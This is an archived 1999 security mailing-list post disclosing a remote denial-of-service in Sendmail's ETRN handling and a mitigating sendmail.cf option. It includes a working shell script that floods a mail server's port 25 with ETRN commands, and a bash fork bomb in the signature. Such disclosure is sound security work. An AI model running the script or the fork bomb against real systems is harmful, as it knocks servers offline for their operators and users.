On Tue, 21 Dec 1999, Rob Jones wrote: > with or without these double-quotes the message is immediately dropped > on redhat linux with the message Oops! Yes, apparently this problem affects all versions of Sendmail, but only with .cf file left from 8.8.x or previous releases. In fact, obsolete .cf files are quite common if Sendmail has been updated by administrator - 'from hand' or from binary packages like .rpm - as people has not enough time and good will to rebuild config files when replacing binary (especially if there are some extensions/custom .cf settings). So, another thing. There's nice remote Sendmail ETRN DoS. When ETRN command is read by Sendmail (it shouldn't be allowed at all, IMHO), it calls fork(). Parent process generates no output - only child-generated output is sent, so parent won't be notified on send()/write() failure. If we drop connection (after sending a lot of ETRNs), parent process will stuck, doing repeately fork() ... sleep(5), till end of ETRNs read into input buffer is reached. This allows us to spawn any amount of 'unusable' sendmail childs, hanging for long period of time - and it can be done using low network bandwitch and resources. Direct result - all server memory consumed (causing Linux 2.0 kernels to crash with messages like 'no memory for sendmail', 'no memory for klogd' etc). Unlike connect() flooding, this attack is generating low traffic, only one connection at time, and seems to be deadly harmful, unless something like: # maximum number of children we allow at one time O MaxDaemonChildren=15 is defined in sendmail.cf (as far I recall, this option is disabled by default). The exploit follows (written for it's beautiful name): -- gurghfrbl.sh -- #!/bin/sh TARGET=localhost COUNT=150 SLEEP=1 echo "gurghfrbl.sh - (c) lcamtuf '99" echo -n "Tickle" while :; do echo -n "." ( NIC=0 while [ "$NIC" -lt "$COUNT" ]; do echo "ETRN x" done ) | telnet $TARGET 25 &>/dev/null & sleep $SLEEP killall -9 telnet &>/dev/null done -- EOF -- _______________________________________________________________________ Michal Zalewski [lcamtufat_private] [link / marchew] [dione.ids.pl SYSADM] [Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};: [voice phone: +48 22 813 25 86] <=-=> [cellular phone: +48 501 4000 69] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:23:29 PDT